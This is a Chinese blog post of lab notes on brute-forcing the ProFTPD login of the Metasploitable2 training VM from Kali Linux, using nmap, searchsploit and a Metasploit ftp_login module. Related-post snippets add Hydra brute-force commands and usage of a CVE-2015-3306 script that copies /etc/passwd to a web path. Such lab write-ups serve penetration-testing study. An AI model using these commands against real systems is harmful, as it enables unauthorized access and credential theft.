kali linux对Metasploitable2漏洞利用,ProFTPD爆力破解 笔记

最新推荐文章于 2023-11-27 18:17:16 发布
最新推荐文章于 2023-11-27 18:17:16 发布
阅读量515 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30508729/article/details/101039809
版权

ProFTPD:一个Unix平台上或是类Unix平台上(如Linux, FreeBSD等)的FTP服务器程序 http://www.proftpd.org/

实验环境:

攻击机:kali linux 
ip:192.168.172.134
目标机:Metasploittable2
ip:192.168.172.129

攻击过程:

step1:探测

nmap -sV -p 2121 192.168.172.129     //探测目标proftpd版本信息

step2:搜索目标漏洞信息

1.打开“www.exploit-db.com”网站 查询对应的软件版本信息,查看是否具有漏洞利用信息

2.命令:searchsploit proftpd            //查看某软件漏洞信息

step3:暴破密码,启动msf

命令:use auxiliary/scanner/ftp/ftp_login

show options

set rhosts 192.168.172.129

set username msfadmin

set pass_file /root/Desktop/password.txt

set rport 2121

step4:开始暴破

命令:exploit

暴破成功

 

02be55f
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
服务攻防-协议漏洞-FTP&RDP&SSH&Rsync&ProFTPD&libssh&Openssh-Hydra工具使用&口令猜解&未授权访问
ran的博客
05-09 1931
▶工具下载地址▶工具简介Hydra是一种强大的网络登录破解工具,它可以尝试多种用户名和密码组合来尝试登录网络服务,例如SSH、FTP、Telnet、SMTP、POP3等等。Hydra支持多线程并发登录尝试,并能自动处理输入和输出,使其成为自动化扫描和攻击测试的理想工具。此外,Hydra还支持使用代理服务器、设置超时时间、支持多种协议等高级功能。Hydra通常被用于渗透测试和网络安全评估,以检测目标系统中可能存在的弱点和安全漏洞
FTP服务后门利用
qq_39687353的博客
04-11 930
FTP服务后门利用 1.什么是 FTP? 是文件传输协议的简称。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。用户可以通过它把自己的PC机与世界各地所有运行FTP协议的服务器相连,访问服务器上的大量程序和信息。 FTP 是因特网网络上历史最悠久的网络工具,从 1971 年由 A KBHUSHAN 提出第一个 FTP 的RFC(RFC114) 至今近半个世纪来,FTP 凭借其独特的优势一直都是因特网中最重要、最广泛的服务之一。 2.searchsploit
kali linuxMetasploitable2漏洞利用,mysql破解 笔记
边城浪子的博客
09-19 1176
MySQL是一个关系型数据库管理系统,由瑞典MySQL AB 公司开发,目前属于 Oracle 旗下产品。MySQL 是最流行的关系型数据库管理系统之一,在 WEB 应用方面,MySQL是最好的 RDBMS (Relational Database Management System,关系数据库管理系统) 应用软件。 MySQL是一种关系数据库管理系统,关系数据库将数据保存在不同的表中,而不是将所...
手把手教你kali渗透Metasploitable
qq_41620273的博客
12-24 1万+
记一次kali渗透Metasploitbale靶机 1.网络设置 2.ifconfig查看Metasploitable的IP: 3.对Metasploitbale进行nmap端口扫描: Nmap 192.168.22.128 端口破:FTP、SSH等 工具:Hydra 备用字典:user.txt: pass,txt: 一、 破FTP hydra -L /root/桌面/user.txt -P /root/桌面/pass.txt [ftp://192.168.22.128](ftp://19
ProFTPD-1.3.3c Backdoor Command Execution漏洞复现+poc
最新发布
开心星人的博客
11-27 745
https://blog.csdn.net/morrino/article/details/115836400 这个文章提供了一个部署1.3.3c版本的靶机。安装 https://blog.csdn.net/feelinghappy/article/details/106817434。https://www.exploit-db.com/exploits/15662 找到了存在后门的软件。在官网和官方github上找了一圈1.3.3c版本的proftpd,应该是漏洞太多,官方把下了。
4.10、漏洞利用-Proftpd、Mysql、Postgresql
c10udz的博客
11-23 800
proftpd的全称是Professional FTP daemon,类unix和unix平台FTP服务器程序,默认使用2121号端口,与vsftpd类似开源。 MySQL是关系型数据库管理系统,默认使用3306端口。关系数据库将数据保存在不同的表中;非关系型数据库,把数据存储到大的内存当中,而不是存储到大的表当中。postgresql(pg)是开源关系型数据库,最开始叫postgres,默认使用5432端口。
安全课堂kali linux笔记1~100课.zip
07-27
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni...目前Kali Linux的最新版本为2019.2,增加了对RTL8812AU网卡的支持
kali Linux渗透技术详解笔记
07-27
kali Linux环境部署,Linux相关命令,枚举工具,简单网络管理协议,邮件传输协议。
Kali Linux 高级渗透测试(原书第2版)(带详细目录)
06-18
KaliLinux面向专业的渗透测试和安全审计,集成了大量精心挑选的安全检测工具。本书在KaliLinux平台上从一个攻击者的角度来审视网络框架,详细介绍了攻击者“杀链”采取的具体步骤。通过阅读本书读者能快速学习并掌握...
KALI linux学习记录笔记
05-13
KALI linux学习记录笔记 linux入门的笔记,包括常用命令!
cpx_proftpd:漏洞利用工具 CVE-2015-3306
06-11
cpx_proftpd Daniel Aldana 针对漏洞利用的 PoC。 Vadim Melihow 报告的错误。 ###方法1: 用法: python cpx_proftp.py <IP> <REMOTE> <REMOTE> 前任: python cpx_proftp.py 127.0.0.1 /etc/passwd /var/www/pass.txt 然后尝试: http://127.0.0.1/pass.txt ###方法2: 用法: python cpx_proftp.py <IP> <REMOTE> 前任: python cpx_proftp.py 127.0.0.1 /var/www/html 然后尝试: http:
proftpd 简介
04-08
 proftpd是一款开放源码的ftp服务器软件,它是原来世界范围使用最广泛的wu-ftpd的改进版,它修正了wu-ftpd的许多缺陷,在许多方面进行了重大的改进,其中一个重要变化就是它学习了Apache 的配置方式,使proftpd的配置和管理更加简单易懂。本文将介绍它在Red hat Linux AS4 中最基本的安装和配置。
KaliLinux中更改GRUB2背景的5种方式
02-01
KaliLinux中更改GRUB背景的简单指南(实际上它是KaliLinux的GRUB 启动图像)。Kali开发团队在这方面做的不多,他们好像太忙了,所以在这篇文章中,我会对GRUB解释一二,但是不会冗长到我失去写作的激情。 那么我们开始...
靶机渗透(五)——metasploitable2
qq_45751902的博客
04-29 5574
目录一、简介二、信息收集三、端口渗透6667-irc21弱口令 一、简介 metasploitable是一个Ubuntu-Linux虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。 靶机下载地址 用户名是 :msfadmin 密码是: msfadmin 二、信息收集 nmap -sS 192.168.92.0/24 开放了好多端口 三、端口渗透 启动msf msfconsole 6667-irc 登录msf search irc 找到对应得
kali渗透测试之远程控制:通过激活靶机Metasploitable 2中的笑脸漏洞使其开启6200端口进行远程控制
m0_64128402的博客
11-06 559
kali渗透测试远程控制之6200端口变成了“后门”
6-20漏洞利用-proftpd测试
山兔的博客
07-28 649
ProFTPD一个Unix平台上或是类Unix平台上(如Linux,FreeBSD等)的FTP服务器程序http可以下载对应的版本,然后进行环境搭建。
看完这篇 教你玩转渗透测试靶机——Metasploitable2
热门推荐
Aluxian_的博客
03-09 2万+
Metasploitable2渗透测试详解Metasploitable2靶机介绍:Metasploitable2靶机下载:Metasploitable2靶机安装:Metasploitable2靶机漏洞详解: Metasploitable2靶机介绍: Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 Metasploita
kali踩坑指北--searchsploit
weixin_43130853的博客
12-08 2156
一 ·参数介绍: -c, --case [Term] 区分大小写(默认不区分大小写) -e, --exact[Term] 对exploit标题进行EXACT匹配 (默认为 AND) [Implies "-t"]. -h, --help 显示帮助 -j, --json [Term] 以JSON格式显示结果 -m, --mirror [EDB-ID] 把一个exp拷贝到当前工作目录,参数后加目标id -o, --overflow [Term] Exploit标题被允许溢出其列 -p, --path
metasploitable2渗透测试
qq_57976347的博客
06-06 1140
一、系统弱密码登录 1、在kali上执行命令行telnet 192.168.26.129 2、Login和password都输入msfadmin 3、登录成功,进入系统 4、测试如下: 二、MySQL弱密码登录: 1、在kali上执行mysql –h 192.168.26.129 –u root 2、登录成功,进入MySQL系统 3、测试效果: 三、PostgreSQL弱密码登录 1、在Kali上执行psql -h 192.168.26.129 –U post...
kali渗透metasploitable2
06-06
Kali渗透是指使用Kali Linux操作系统进行渗透测试,而Metasploitable 2是一个虚拟机映像,旨在提供一个易于使用的目标,以进行渗透测试和漏洞研究。使用Kali渗透Metasploitable 2可以帮助安全专业人员测试自己的网络...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值